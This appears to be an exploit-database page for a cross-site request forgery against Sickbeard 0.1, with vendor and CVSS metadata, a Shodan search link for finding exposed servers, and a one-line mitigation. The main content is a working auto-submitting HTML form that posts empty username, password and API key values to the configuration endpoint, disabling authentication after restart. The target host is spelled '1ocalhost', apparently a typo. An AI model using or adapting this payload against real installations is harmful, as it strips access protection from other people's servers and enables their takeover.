header-logo
Suggest Exploit
vendor:
Sickbeard
by:
bdrake
5.5
CVSS
MEDIUM
Cross-Site Request Forgery
352
CWE
Product Name: Sickbeard
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE:
CPE: a:sickbeard_project:sickbeard:0.1
Metasploit:
Other Scripts:
Platforms Tested: Fedora 32
2020

Sickbeard 0.1 – Cross-Site Request Forgery (Disable Authentication)

This exploit allows an attacker to disable authentication in Sickbeard 0.1 by sending a crafted request. By clearing the username and password fields in the form, authentication can be bypassed. The changes take effect after a server restart.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Sickbeard or apply the vendor's recommended configuration settings to enforce authentication.
Source

Exploit-DB raw data:

# Exploit Title: Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)
# Google Dork: https://www.shodan.io/search?query=sickbeard
# Date: 2020-06-06
# Exploit Author: bdrake
# Vendor Homepage: https://sickbeard.com/
# Software Link: https://github.com/midgetspy/Sick-Beard
# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121
# Tested on: Fedora 32
# CVE : NA

<html>
<body>
	<!-- 
		Clearing username and password disables authentication.
		Requires a server restart for changes to take effect.
	-->
	<form action="http://1ocalhost:8081/config/general/saveGeneral" method="POST">
		<input type="hidden" name="log_dir" value="Logs" />
	   	<input type="hidden" name="web_port" value="8081" />
   	    <input type="hidden" name="web_username" value="" />
		<input type="hidden" name="web_password" value="" />
		<input type="hidden" name="https_cert" value="server.crt" />
		<input type="hidden" name="https_key" value="server.key" />
		<input type="hidden" name="api_key" value="" />
    </form>
    <script>
		document.forms[0].submit();
    </script>
</body>
</html>